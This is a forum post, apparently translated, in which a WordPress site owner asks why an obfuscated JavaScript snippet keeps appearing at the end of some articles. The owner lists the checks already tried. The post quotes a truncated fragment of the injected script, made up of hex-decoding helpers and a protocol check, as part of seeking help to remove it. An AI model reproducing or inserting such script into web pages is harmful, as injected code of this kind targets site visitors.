Malware

What to do, there is a javascript insert at the end of posts on worpdress?

There is a site on Wordpress.
And there is a problem, that the following piece is added to the end of some articles:

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/ g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){ return " site domain "},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e= 0;e

• I tested a couple of zero topics on the site, but I checked it on virustotal beforehand and everything was fine. All threads have now been removed.
  
• I use the same plugins as on many other sites where there are no problems
  
• Antivirus plugins can't find anything (tried 5 different pieces).
  
• Ai-bolit did not find anything obvious, but checked the suspicious ones in his opinion, there seems to be nothing there.
  
• Handles through WinMerge drove, compared with a pure distribution of Wordpress - in different php found nothing suspicious.
  
• In the database, by pieces of code, it finds only the texts of the articles themselves.
  
• There are no problems on other sites on the same hosting account.
  
• Articles are written by the editor, when I test something to post from my account - there is no problem, but when she posts new posts, sometimes there is a problem. The trouble is that sometimes (maybe through my account sometimes there is also such a problem, but it was not possible to reproduce it).
  
• But she has Kaspersky (I know that it's not a panacea, but still), and just in case, she recently did a full scan.
  
• Another point that confuses me in the version that it has a problem, and not on the site, is that in this piece of code there is a site domain on which records are fasting.
  

Don't even know. where else to dig. who faced the problem? In Google, by pieces of code, he finds many other sites with inserts, including those created on wordpress.com (blog platform).